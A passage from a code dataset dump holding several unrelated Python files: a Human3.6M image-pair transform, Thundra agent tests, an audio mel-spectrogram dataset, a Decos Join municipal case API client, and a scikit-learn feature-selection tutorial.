y_M = M.squeeze(dim=-1).tolist()\n input[\"image\"], (x_off, y_off) = self.crop(\n image=input[\"image\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[\"mask\"], (_, _) = self.crop(\n image=input[\"mask\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[\"K\"] = input[\"K\"] - torch.tensor(\n [\n [0.0, 0.0, x_off],\n [0.0, 0.0, y_off],\n [0.0, 0.0, 0.0],\n ]\n )\n # input[\"pose_2d\"][\"p\"] = input[\"pose_2d\"][\"p\"] - torch.tensor([[x_off], [y_off]])\n input[\"crop_offset\"] = torch.tensor([x_off, y_off])\n input[\"cropped_resolution\"] = torch.tensor(input[\"image\"].size)\n\n if self.resize:\n input[\"image\"], (w_r, h_r) = self.resize(image=input[\"image\"])\n input[\"mask\"], (_, _) = self.resize(image=input[\"mask\"])\n input[\"K\"] = input[\"K\"] * torch.tensor(\n [\n [w_r, 1.0, w_r],\n [1.0, h_r, h_r],\n [1.0, 1.0, 1.0],\n ]\n )\n # input[\"pose_2d\"][\"p\"] = input[\"pose_2d\"][\"p\"] * torch.tensor([[w_r], [h_r]])\n input[\"resized_resolution\"] = torch.tensor(input[\"image\"].size)\n\n input[\"stabilized_padding\"] = stabilized_padding(\n crop_offset=input[\"crop_offset\"],\n original_resolution=input[\"resolution\"],\n cropped_resolution=input[\"cropped_resolution\"],\n resized_resolution=input[\"resized_resolution\"],\n )\n\n input[\"image\"] = self.i2t(input[\"image\"])\n input[\"mask\"] = self.m2t(input[\"mask\"])\n # input[\"masked_image\"] = input[\"mask\"] * input[\"image\"]\n input[\"masked_image\"] = (\n input[\"mask\"] * input[\"image\"]\n + ~input[\"mask\"] * MEDIAN_PIXEL[..., None, None]\n )\n\n return input\n\n\nclass Human36MImagePairTransform(object):\n def __init__(\n self,\n cr_margin_A: Union[float, Tuple[float, float]] = None,\n cr_margin_B: Union[float, Tuple[float, float]] = None,\n re_size_A: Union[int, Tuple[int, int]] = None,\n re_size_B: Union[int, Tuple[int, int]] = None,\n ):\n self.i2t = ImageToTensor()\n self.m2t = MaskToTensor()\n\n self.views = [\"A\", \"B\"]\n self.crop = {\n \"A\": None,\n \"B\": None,\n }\n if cr_margin_A is not None:\n self.crop[\"A\"] = DynamicSquareCrop(margin=cr_margin_A)\n if cr_margin_B is not None:\n self.crop[\"B\"] = DynamicSquareCrop(margin=cr_margin_B)\n\n self.resize = {\n \"A\": None,\n \"B\": None,\n }\n if re_size_A is not None:\n self.resize[\"A\"] = Resize(size=re_size_A)\n if re_size_B is not None:\n self.resize[\"B\"] = Resize(size=re_size_B)\n\n def __call__(self, input: dict) -> dict:\n for v in self.views:\n p = input[v][\"pose_2d\"]\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[v][\"pose_2d\"] = {\n \"p\": p,\n \"c\": c,\n }\n\n p = input[\"W\"][\"pose_3d\"]\n p = world_to_camera(\n xyz=p,\n R=input[v][\"R\"][None, :, :],\n t=input[v][\"t\"][None, :, :],\n )\n c = torch.ones(len(JOINTS), 1, 1, dtype=torch.bool)\n input[v][\"pose_3d\"] = {\n \"root\": {\n \"p\": p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n \"relative\": {\n \"p\": p - p[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n \"c\": c & c[JOINTS[\"HipCenter\"] : JOINTS[\"HipCenter\"] + 1, :, :],\n },\n }\n\n x_off, y_off = 0.0, 0.0\n if self.crop[v]:\n p, c = input[v][\"pose_2d\"][\"p\"], input[v][\"pose_2d\"][\"c\"]\n points = p[c.expand_as(p)].reshape(-1, 2, 1)\n points = points if len(points) > 0 else p\n (m, _), (M, _) = points.min(dim=-3), points.max(dim=-3)\n x_m, y_m = m.squeeze(dim=-1).tolist()\n x_M, y_M = M.squeeze(dim=-1).tolist()\n input[v][\"image\"], (x_off, y_off) = self.crop[v](\n image=input[v][\"image\"],\n 
bounds=(x_m, y_m, x_M, y_M),\n )\n input[v][\"mask\"], (_, _) = self.crop[v](\n image=input[v][\"mask\"],\n bounds=(x_m, y_m, x_M, y_M),\n )\n input[v][\"K\"] = input[v][\"K\"] - torch.tensor(\n [\n [0.0, 0.0, x_off],\n [0.0, 0.0, y_off],\n [0.0, 0.0, 0.0],\n ]\n )\n # input[v][\"pose_2d\"][\"p\"] = input[v][\"pose_2d\"][\"p\"] - torch.tensor([[x_off], [y_off]])\n input[v][\"crop_offset\"] = torch.tensor([x_off, y_off])\n input[v][\"cropped_resolution\"] = torch.tensor(input[v][\"image\"].size)\n\n if self.resize[v]:\n input[v][\"image\"], (w_r, h_r) = self.resize[v](image=input[v][\"image\"])\n input[v][\"mask\"], (_, _) = self.resize[v](image=input[v][\"mask\"])\n input[v][\"K\"] = input[v][\"K\"] * torch.tensor(\n [\n [w_r, 1.0, w_r],\n [1.0, h_r, h_r],\n [1.0, 1.0, 1.0],\n ]\n )\n # input[v][\"pose_2d\"][\"p\"] = input[v][\"pose_2d\"][\"p\"] * torch.tensor([[w_r], [h_r]])\n input[v][\"resized_resolution\"] = torch.tensor(input[v][\"image\"].size)\n\n input[v][\"stabilized_padding\"] = stabilized_padding(\n crop_offset=input[v][\"crop_offset\"],\n original_resolution=input[v][\"resolution\"],\n cropped_resolution=input[v][\"cropped_resolution\"],\n resized_resolution=input[v][\"resized_resolution\"],\n )\n\n input[v][\"image\"] = self.i2t(input[v][\"image\"])\n input[v][\"mask\"] = self.m2t(input[v][\"mask\"])\n # input[v][\"masked_image\"] = input[v][\"mask\"] * input[v][\"image\"]\n input[v][\"masked_image\"] = (\n input[v][\"mask\"] * input[v][\"image\"]\n + ~input[v][\"mask\"] * MEDIAN_PIXEL[..., None, None]\n )\n\n return input\n","repo_name":"GuillaumeRochette/HumanViewSynthesis","sub_path":"data/Human36M/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":8612,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"25754184629","text":"import mock\nimport pytest\n\nfrom thundra.config import config_names\nfrom thundra.config.config_provider import ConfigProvider\nfrom thundra.context.execution_context_manager import ExecutionContextManager\nfrom thundra.plugins.trace.trace_plugin import TracePlugin\nfrom thundra.thundra_agent import Thundra\n\n\ndef test_if_api_key_is_retrieved_from_env_var():\n ConfigProvider.set(config_names.THUNDRA_APIKEY, 'api key')\n thundra = Thundra()\n assert thundra.api_key == 'api key'\n\n\ndef test_if_disable_trace_is_set_to_true():\n thundra = Thundra('api key', disable_trace=True)\n\n for plugin in thundra.plugins:\n assert not type(plugin) is TracePlugin\n\n\ndef test_if_disable_trace_is_set_to_false():\n thundra = Thundra('api key', disable_trace=False)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_if_disable_trace_is_not_set():\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_disable_trace_plugin_from_environment_variable():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is False\n\n\ndef test_enable_trace_plugin_from_environment_variable():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'false')\n thundra = Thundra('api key')\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, 
TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\ndef test_if_disable_trace_plugin_from_environment_variable_is_prior():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n thundra = Thundra('api key', disable_trace=False)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is False\n\n\ndef test_if_enable_trace_plugin_from_environment_variable_is_prior():\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'false')\n thundra = Thundra('api key', disable_trace=True)\n\n trace_exist = False\n for plugin in thundra.plugins:\n if isinstance(plugin, TracePlugin):\n trace_exist = True\n\n assert trace_exist is True\n\n\n@mock.patch('thundra.reporter.Reporter')\ndef test_if_thundra_is_disabled(mock_reporter, handler, mock_event, mock_context):\n ConfigProvider.set(config_names.THUNDRA_TRACE_DISABLE, 'true')\n _, handler = handler\n\n handler(mock_event, mock_context)\n\n assert not mock_reporter.add_report.called\n assert not mock_reporter.send_reports.called\n\n\ndef test_if_exception_is_handled(handler_with_exception, mock_context, mock_event):\n thundra, handler = handler_with_exception\n with pytest.raises(Exception):\n handler(mock_event, mock_context)\n\n assert ExecutionContextManager.get().error\n\n\n@mock.patch('thundra.thundra_agent.Thundra.check_and_handle_warmup_request')\ndef test_if_thundra_crashes_user_handler_before(mocked_func, handler, mock_event, mock_context):\n mocked_func.side_effect = RuntimeError('Boom!')\n thundra, handler = handler\n try:\n handler(mock_event, mock_context)\n except Exception:\n pytest.fail(\"User's handler shouldn't fail when Thundra raise an exception\")\n\n\n@mock.patch('thundra.reporter.Reporter.send_reports')\ndef test_if_thundra_crashes_user_handler_after(mocked_func, handler, mock_event, mock_context):\n mocked_func.side_effect = RuntimeError('Boom!')\n thundra, handler = handler\n try:\n handler(mock_event, mock_context)\n except Exception:\n pytest.fail(\"User's handler shouldn't fail when Thundra raise an exception\")\n","repo_name":"thundra-io/thundra-agent-python","sub_path":"tests/test_thundra_agent.py","file_name":"test_thundra_agent.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"32826732716","text":"import torch\nfrom torch.utils.data import Dataset\nfrom torchaudio import load, transforms\nimport glob\nimport os\n\n\nclass AudioDataset(Dataset):\n def __init__(\n self,\n path,\n sample_rate=22050,\n n_fft=2048,\n n_mels=128,\n win_length=1024,\n hop_length=1024,\n log_mel=True,\n augment=False\n ):\n \"\"\"\n A custom dataset class to load audio snippets and create\n mel spectrograms.\n\n Args:\n path (string): path to folder with audio files\n sample_rate (integer): sample rate of audio signal\n n_fft (integer): number of Fourier transforms to use for the mel spectrogram\n n_mels (integer): number of mel bins to use for the mel spectrogram\n log_mel (boolean): whether to use log-mel spectrograms instead of db-scaled\n \"\"\"\n self.path = path\n self.sr = sample_rate\n self.n_fft = n_fft\n self.n_mels = n_mels\n self.win_length = win_length\n self.hop_length = hop_length\n self.log_mel = log_mel\n self.augment = augment\n self.file_paths = glob.glob(os.path.join(self.path, \"**\", f\"*wav\"), recursive=True)\n self.labels = [x.split(\"/\")[-2] for x in self.file_paths]\n self.mapping = {\"ads_other\": 
0, \"music\": 1}\n for i, label in enumerate(self.labels):\n self.labels[i] = self.mapping[label]\n\n def __len__(self):\n return len(self.file_paths)\n\n def __getitem__(self, index):\n audio, sr = load(self.file_paths[index])\n audio = torch.mean(audio, dim=0, keepdim=True)\n if self.sr != sr:\n audio = transforms.Resample(sr, self.sr)(audio)\n mel_spectrogram = transforms.MelSpectrogram(\n sample_rate=self.sr,\n n_fft=self.n_fft,\n win_length=self.win_length,\n hop_length=self.hop_length,\n n_mels=self.n_mels,\n f_max=self.sr / 2\n )(audio)\n if self.log_mel:\n offset = 1e-6\n mel_spectrogram = torch.log(mel_spectrogram + offset)\n else:\n mel_spectrogram = transforms.AmplitudeToDB(stype=\"power\", top_db=80)(mel_spectrogram)\n if self.augment:\n audio = transforms.FrequencyMasking(freq_mask_param=20)(audio)\n audio = transforms.TimeMasking(time_mask_param=10)(audio)\n label = self.labels[index]\n return mel_spectrogram, label\n","repo_name":"rvdmaazen/Radio-Audio-Classification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40956332261","text":"import concurrent.futures\nimport logging\nimport math\n\nimport requests\nfrom requests import PreparedRequest\nfrom requests.auth import HTTPBasicAuth\n\nfrom app.auth import PROFILE_TYPE_COMMERCIAL, PROFILE_TYPE_PRIVATE\nfrom app.config import (\n DECOS_API_REQUEST_TIMEOUT,\n get_decosjoin_adres_boeken_bsn,\n get_decosjoin_adres_boeken_kvk,\n)\nfrom app.crypto import encrypt\nfrom app.field_parsers import (\n get_fields,\n to_date,\n to_int,\n to_string,\n to_string_or_empty_string,\n)\nfrom app.zaaktypes import zaken_index\n\nPAGE_SIZE = 60\n\nSELECT_FIELDS = \",\".join(\n [\n \"title\",\n \"mark\",\n \"text45\",\n \"subject1\",\n \"bol7\",\n \"bol8\",\n \"bol9\",\n \"bol10\",\n \"bol11\",\n \"bol12\",\n \"bol13\",\n \"bol16\",\n \"bol17\",\n \"bol18\",\n \"bol20\",\n \"bol21\",\n \"bol22\",\n \"bol23\",\n \"company\",\n \"date1\",\n \"date2\",\n \"date5\",\n \"date6\",\n \"date7\",\n \"date8\",\n \"dfunction\",\n \"document_date\",\n \"num3\",\n \"num6\",\n \"num14\",\n \"num15\",\n \"text5\",\n \"text6\",\n \"text7\",\n \"text8\",\n \"text9\",\n \"text10\",\n \"text11\",\n \"text12\",\n \"text13\",\n \"text14\",\n \"text15\",\n \"text17\",\n \"text18\",\n \"text19\",\n \"text20\",\n \"text21\",\n \"text22\",\n \"text25\",\n \"text39\",\n \"text49\",\n \"processed\",\n \"sequence\",\n ]\n)\n\n\ndef get_decosjoin_adres_boeken():\n return {\n PROFILE_TYPE_PRIVATE: get_decosjoin_adres_boeken_bsn(),\n PROFILE_TYPE_COMMERCIAL: get_decosjoin_adres_boeken_kvk(),\n }\n\n\nclass DecosJoinConnection:\n def __init__(self, username, password, api_host, adres_boeken=None):\n self.username = username\n self.password = password\n self.adres_boeken = (\n adres_boeken if adres_boeken else get_decosjoin_adres_boeken()\n )\n self.api_host = api_host\n self.api_location = \"/decosweb/aspx/api/v1/\"\n self.api_url = f\"{self.api_host}{self.api_location}\"\n\n def get_response(self, *args, **kwargs):\n \"\"\"Easy to mock intermediate function.\"\"\"\n return requests.get(*args, **kwargs)\n\n def post_response(self, *args, **kwargs):\n \"\"\"Easy to mock intermediate function.\"\"\"\n return requests.post(*args, **kwargs)\n\n def request(self, url, method=\"get\", json=None):\n \"\"\"Makes a request to the decos join api with HTTP basic auth credentials added.\"\"\"\n if method == \"get\":\n response = 
self.get_response(\n url,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/itemdata\"},\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n elif method == \"post\":\n response = self.post_response(\n url,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/itemdata\"},\n json=json,\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n else:\n raise RuntimeError(\"Method needs to be GET or POST\")\n\n if response.status_code == 200:\n json = response.json()\n return json\n else:\n response.raise_for_status()\n\n def get_search_query_json(self, bsn: str, book_key: str):\n return {\n \"bookKey\": book_key,\n \"orderBy\": \"sequence\",\n \"skip\": 0,\n \"take\": 50,\n \"searchInHierarchyPath\": False,\n \"searchInPendingItemContainerKeys\": False,\n \"filterFields\": {\n \"num1\": [\n {\"FilterOperation\": 1, \"FilterValue\": bsn, \"FilterOperator\": \"=\"}\n ]\n },\n }\n\n def get_user_keys(self, profile_type, user_identifier):\n \"\"\"Retrieve the internal ids used for a user.\"\"\"\n keys = []\n\n adres_boeken = self.adres_boeken[profile_type]\n\n def get_key(boek):\n keys = []\n url = f\"{self.api_url}search/books?properties=false\"\n\n res_json = self.request(\n url,\n json=self.get_search_query_json(user_identifier, boek),\n method=\"post\",\n )\n\n if res_json[\"itemDataResultSet\"][\"count\"] > 0:\n for item in res_json[\"itemDataResultSet\"][\"content\"]:\n user_key = item[\"key\"]\n keys.append(user_key)\n\n return keys\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n get_key, adres_boeken, timeout=DECOS_API_REQUEST_TIMEOUT\n )\n\n for result in results:\n keys.extend(result)\n\n return keys\n\n @staticmethod\n def is_list_match(zaak, key, test_list) -> bool:\n value = zaak[key] if key in zaak else None\n if value is None:\n return False\n value = value.lower()\n return value in test_list\n\n def transform(self, zaken_source, user_identifier): # noqa: C901\n new_zaken = []\n deferred_zaken = []\n\n for zaak_source in zaken_source:\n source_fields = zaak_source[\"fields\"]\n\n # Cannot reliably determine the zaaktype of this zaak\n if \"text45\" not in source_fields:\n continue\n\n source_fields.update({\"id\": zaak_source[\"key\"]})\n\n zaak_type = source_fields[\"text45\"]\n\n # Zaak is defined\n if zaak_type not in zaken_index:\n continue\n\n Zaak = zaken_index[zaak_type]\n new_zaak = Zaak(source_fields).result()\n\n if new_zaak is None:\n continue\n\n # These matching conditions are used to prevent these items from being included in the returned list of zaken\n if self.is_list_match(\n new_zaak,\n \"description\",\n [\"wacht op online betaling\", \"wacht op ideal betaling\"],\n ):\n continue\n\n if self.is_list_match(\n new_zaak,\n \"decision\",\n [\"buiten behandeling\", \"geannuleerd\", \"geen aanvraag of dubbel\"],\n ):\n continue\n\n if new_zaak[\"description\"] and new_zaak[\"description\"].lower().startswith(\n \"*verwijder\"\n ):\n continue\n\n # This url can be used to retrieve matching document attachments for this particular zaak\n new_zaak[\n \"documentsUrl\"\n ] = f\"/decosjoin/listdocuments/{encrypt(zaak_source['key'], user_identifier)}\"\n\n if Zaak.defer_transform:\n deferred_zaken.append([new_zaak, Zaak])\n else:\n new_zaken.append(new_zaak)\n\n deferred_zaken.sort(key=lambda x: x[0].get(\"caseType\"))\n\n # In parallel\n # Makes it possible to defer adding the zaak to the zaken response for example to:\n # - Adding dateWorkflowActive by querying other 
Api's\n def perform_deferred_transform(zaak_tuple):\n [deferred_zaak, Zaak_cls] = zaak_tuple\n return Zaak_cls.defer_transform(\n zaak_deferred=deferred_zaak,\n decosjoin_service=self,\n )\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n perform_deferred_transform,\n deferred_zaken,\n timeout=DECOS_API_REQUEST_TIMEOUT,\n )\n\n for result in results:\n new_zaken.append(result)\n\n zaken_source_sorted = sorted(new_zaken, key=lambda zaak: zaak[\"identifier\"])\n\n return zaken_source_sorted\n\n def get_page(self, url, offset=None):\n \"\"\"Get a single page for url. When offset is provided add that to the url.\"\"\"\n if offset:\n url += f\"&skip={offset}\"\n res_json = self.request(url)\n logging.debug(f\"Get page {url} - offset: {offset}\")\n logging.debug(res_json)\n return res_json\n\n def get_all_pages(self, url):\n \"\"\"Get 'content' from all pages for the provided url\"\"\"\n\n req = PreparedRequest()\n req.prepare_url(url, {\"top\": PAGE_SIZE}) # append top get param\n url = req.url\n\n items = []\n # fetch one page to get the first part of the data and item count\n res = self.get_page(url)\n\n end = math.ceil(res[\"count\"] / PAGE_SIZE) * PAGE_SIZE\n items.extend(res[\"content\"])\n\n for offset in range(PAGE_SIZE, end, PAGE_SIZE):\n res = self.get_page(url, offset)\n items.extend(res[\"content\"])\n\n return items\n\n def get_zaken(self, profile_type, user_identifier):\n zaken_source = []\n user_keys = self.get_user_keys(profile_type, user_identifier)\n\n def fetch_zaken(key):\n url = f\"{self.api_url}items/{key}/folders?select={SELECT_FIELDS}\"\n zaken = self.get_all_pages(url)\n return zaken\n\n # execute in parallel\n with concurrent.futures.ThreadPoolExecutor(max_workers=12) as executor:\n results = executor.map(\n fetch_zaken, user_keys, timeout=DECOS_API_REQUEST_TIMEOUT\n )\n\n for result in results:\n zaken_source.extend(result)\n\n zaken = self.transform(zaken_source, user_identifier)\n return zaken\n\n def get_document_data(self, document_id: str):\n res_json = self.request(f\"{self.api_url}items/{document_id}/blob?select=bol10\")\n\n content = res_json[\"content\"]\n if content:\n for i in content[::-1]:\n is_pdf = i[\"fields\"].get(\"bol10\", False)\n if is_pdf:\n return {\"is_pdf\": is_pdf, \"doc_key\": i[\"key\"]}\n return {\n \"is_pdf\": False,\n }\n\n def get_documents(self, zaak_id, identifier):\n url = f\"{self.api_url}items/{zaak_id}/documents?select=subject1,sequence,mark,text39,text40,text41,itemtype_key\"\n\n res = self.get_all_pages(url)\n\n parse_fields = [\n {\"name\": \"title\", \"from\": \"text41\", \"parser\": to_string_or_empty_string},\n {\"name\": \"id\", \"from\": \"mark\", \"parser\": to_string},\n {\"name\": \"sequence\", \"from\": \"sequence\", \"parser\": to_int},\n {\"name\": \"text39\", \"from\": \"text39\", \"parser\": to_string_or_empty_string},\n {\"name\": \"text40\", \"from\": \"text40\", \"parser\": to_string_or_empty_string},\n {\"name\": \"text41\", \"from\": \"text41\", \"parser\": to_string_or_empty_string},\n ]\n\n new_docs = []\n\n for item in res:\n document_source = item[\"fields\"]\n if document_source[\"itemtype_key\"].lower() == \"document\":\n document_meta_data = get_fields(parse_fields, document_source)\n\n if (\n document_meta_data[\"text39\"].lower() == \"definitief\"\n and document_meta_data[\"text40\"].lower()\n in [\"openbaar\", \"beperkt openbaar\"]\n and document_meta_data[\"text41\"].lower() != \"nvt\"\n ):\n doc_data = self.get_document_data(item[\"key\"])\n\n if 
doc_data[\"is_pdf\"]:\n document_meta_data[\n \"url\"\n ] = f\"/decosjoin/document/{encrypt(doc_data['doc_key'], identifier)}\"\n\n del document_meta_data[\"text39\"]\n del document_meta_data[\"text40\"]\n del document_meta_data[\"text41\"]\n\n new_docs.append(document_meta_data)\n\n new_docs.sort(key=lambda x: x[\"sequence\"])\n\n for doc in new_docs:\n del doc[\"sequence\"]\n\n return new_docs\n\n def get_document_blob(self, document_id):\n url_blob_content = f\"{self.api_url}items/{document_id}/content\"\n\n document_response = self.get_response(\n url_blob_content,\n auth=HTTPBasicAuth(self.username, self.password),\n headers={\"Accept\": \"application/octet-stream\"},\n )\n\n return {\n \"Content-Type\": document_response.headers[\"Content-Type\"],\n \"file_data\": document_response.content,\n }\n\n def get_workflow_date_by_step_title(self, zaak_id: str, step_title: str):\n all_workflows_response = self.request(\n f\"{self.api_url}items/{zaak_id}/workflows\"\n )\n\n if all_workflows_response and all_workflows_response[\"count\"] > 0:\n # Take last workflow key\n\n worflow_key = all_workflows_response[\"content\"][-1][\"key\"]\n single_workflow_url = f\"{self.api_url}items/{worflow_key}/workflowlinkinstances?properties=false&fetchParents=false&oDataQuery.select=mark,date1,date2,text7,sequence&oDataQuery.orderBy=sequence\"\n single_workflow_response = self.request(single_workflow_url)\n\n if not single_workflow_response[\"content\"]:\n return None\n\n workflow_step_date = None\n logging.debug(\n f\"Find workflow step for {zaak_id} by step title {step_title}\"\n )\n for workflow_step in single_workflow_response[\"content\"]:\n if (\n \"text7\" in workflow_step[\"fields\"]\n and workflow_step[\"fields\"][\"text7\"] == step_title\n ):\n logging.debug(workflow_step[\"fields\"])\n workflow_step_date = to_date(workflow_step[\"fields\"][\"date1\"])\n\n return workflow_step_date\n\n return None\n","repo_name":"Amsterdam/mijn-decos-join-api","sub_path":"app/decosjoin_service.py","file_name":"decosjoin_service.py","file_ext":"py","file_size_in_byte":13753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1178368925","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Construct a man-made data\ndf = pd.DataFrame(np.array([\n [1., 2., 3., 4.],\n [5., 6., np.nan, 8.],\n [10., 11., 12., np.nan]\n]), columns=list('ABCD'))\n\n# Imputation 插值\nfrom sklearn.preprocessing import Imputer\n\nimr = Imputer(missing_values='NaN', strategy='mean', axis=0)\nimr = imr.fit(df)\nimputed_data = imr.transform(df.values)\nimputed_data\n\ndf = pd.DataFrame([\n ['green', 'M', 10.1, 'class1'],\n ['red', 'L', 13.5, 'class2'],\n ['blue', 'XL', 15.3, 'class1']\n], columns=['color', 'size', 'price', 'classlabel'])\n\n# Convert ordinal feature to int number\nsize_mapping = {\n 'XL': 3,\n 'L': 2,\n \"M\": 1\n}\n\ninv_size_mapping = {v: k for k, v in size_mapping.items()}\n\ndf['size'] = df['size'].map(size_mapping)\n\nclass_mapping = {label: idx for idx,\n label in enumerate(np.unique(df['classlabel']))}\ninv_class_mapping = {v: k for k, v in class_mapping.items()}\n\ndf['classlabel'] = df['classlabel'].map(class_mapping)\n\nfrom sklearn.preprocessing import LabelEncoder\n\nclass_le = LabelEncoder()\ny = class_le.fit_transform(df['classlabel'].values)\n\ncolor_re = LabelEncoder()\ndf.ix[:, 0] = color_re.fit_transform(df.ix[:, 0].values)\n\n# One-hot encoding == pd.get_dummpy()\nfrom sklearn.preprocessing import OneHotEncoder\n\nohe = 
OneHotEncoder(categorical_features=[0], sparse=True)\nohe.fit_transform(df.values).toarray()\n\nfrom sklearn.datasets import load_wine\n\nwine_data = load_wine()\nwine_df = pd.DataFrame(wine_data['data'], columns=wine_data['feature_names'])\nwine_df['target'] = wine_data['target']\n\nfrom sklearn.model_selection import train_test_split\n\nX, y = wine_df.iloc[:, :-1].values, wine_df.iloc[:, -1].values\nX_train, X_test, y_train, y_test = train_test_split(\n    X, y, test_size=0.3, random_state=0)\n\n# Normalization\nfrom sklearn.preprocessing import MinMaxScaler\n\nmms = MinMaxScaler()\nX_train_norm = mms.fit_transform(X_train)\nX_test_norm = mms.transform(X_test)  # reuse the training-set fit; refitting on test data leaks information\n\n# Standardization\nfrom sklearn.preprocessing import StandardScaler\n\nstdsc = StandardScaler()\nX_train_std = stdsc.fit_transform(X_train)\nX_test_std = stdsc.transform(X_test)  # reuse the training-set fit; refitting on test data leaks information\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression(penalty='l1', C=0.1)\nlr.fit(X_train_std, y_train)\nprint(\"Training Accuracy:\", lr.score(X_train_std, y_train))\nprint(\"Test Accuracy:\", lr.score(X_test_std, y_test))\n\n# Plot Regularization Weights Variation\nfig = plt.figure()\nax = plt.subplot(111)\ncolors = ['blue', 'green', 'red', 'cyan', 'magenta',\n          'yellow', 'black', 'pink', 'lightgreen',\n          'lightblue', 'gray', 'indigo', 'orange']\nweights, params = [], []\nfor c in np.arange(-4.0, 6.0):\n    lr = LogisticRegression(penalty='l1', C=10 ** c, random_state=0)\n    lr.fit(X_train_std, y_train)\n    weights.append(lr.coef_[1])\n    params.append(10 ** c)\nweights = np.array(weights)\nfor col, color in zip(range(weights.shape[1]), colors):\n    ax.plot(params, weights[:, col], label=wine_df.columns[col], color=color)\nplt.axhline(0, color='black', ls='--', lw=3)\nplt.xlim([10 ** (-5), 10 ** 5])\nplt.ylabel('weight coefficient')\nplt.xlabel('C')\nplt.xscale('log')\nax.legend(loc='upper center', bbox_to_anchor=(\n    1.38, 1.03), ncol=1, fancybox=True)\nplt.show()\n\n# Sequential Backward Selection\nfrom sklearn.base import clone\nfrom itertools import combinations\nfrom sklearn.metrics import accuracy_score\n\n\nclass SBS(object):\n    def __init__(self, estimator, k_features, scoring=accuracy_score, test_size=0.25,\n                 random_state=1):\n        self.scoring = scoring\n        self.estimator = clone(estimator)\n        self.k_features = k_features\n        self.test_size = test_size\n        self.random_state = random_state\n\n    def fit(self, X, y):\n        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=self.test_size,\n                                                            random_state=self.random_state)\n        dim = X_train.shape[1]  # feature number\n        self.indices_ = tuple(range(dim))\n        self.subsets_ = [self.indices_]\n        score = self._calc_score(\n            X_train, y_train, X_test, y_test, self.indices_)\n        self.scores_ = [score]\n\n        while dim > self.k_features:\n            scores = []\n            subsets = []\n\n            for p in combinations(self.indices_, r=dim - 1):\n                score = self._calc_score(X_train, y_train, X_test, y_test, p)\n                scores.append(score)\n                subsets.append(p)\n\n            best = np.argmax(scores)\n            self.indices_ = subsets[best]\n            self.subsets_.append(self.indices_)\n\n            dim -= 1\n            self.scores_.append(scores[best])\n\n        self.k_score_ = self.scores_[-1]\n\n        return self\n\n    def transform(self, X):\n        return X[:, self.indices_]\n\n    def _calc_score(self, X_train, y_train, X_test, y_test, indices):\n        self.estimator.fit(X_train[:, indices], y_train)\n        y_pred = self.estimator.predict(X_test[:, indices])\n        score = self.scoring(y_test, y_pred)\n        return score\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = 
KNeighborsClassifier(n_neighbors=2)\nsbs = SBS(knn, k_features=1)\nsbs.fit(X_train_std, y_train)\nk_feat = [len(k) for k in sbs.subsets_]\nplt.plot(k_feat, sbs.scores_, marker='o')\nplt.ylim([0.7, 1.1])\nplt.ylabel('Accuracy')\nplt.xlabel('Number of features')\nplt.grid()\nplt.show()\n\n# Test the top five significant features\nk5 = list(sbs.subsets_[8]) # 8 = 13 - 5\nprint(wine_df.columns[k5])\n\nknn.fit(X_train_std, y_train)\nprint(\"Training Accuracy:\", knn.score(X_train_std, y_train))\nprint('Test Accuracy:', knn.score(X_test_std, y_test))\n\nknn.fit(X_train_std[:, k5], y_train)\nprint(\"Training Accuracy:\", knn.score(X_train_std[:, k5], y_train))\nprint('Test Accuracy:', knn.score(X_test_std[:, k5], y_test))\n\n# judge the feature importance by random forest\nfrom sklearn.ensemble import RandomForestClassifier\n\nfeat_labels = wine_df.columns[:-1]\nforest = RandomForestClassifier(n_estimators=10000, random_state=0, n_jobs=-1)\nforest.fit(X_train, y_train)\nimportances = forest.feature_importances_\nindices = np.argsort(importances)[::-1]\nfor f in range(X_train.shape[1]):\n    print('%2d) %-*s %f' %\n          (f + 1, 30, feat_labels[indices[f]], importances[indices[f]]))\n\nplt.title(\"Feature Importances\")\nplt.bar(range(X_train.shape[1]), importances[indices],\n        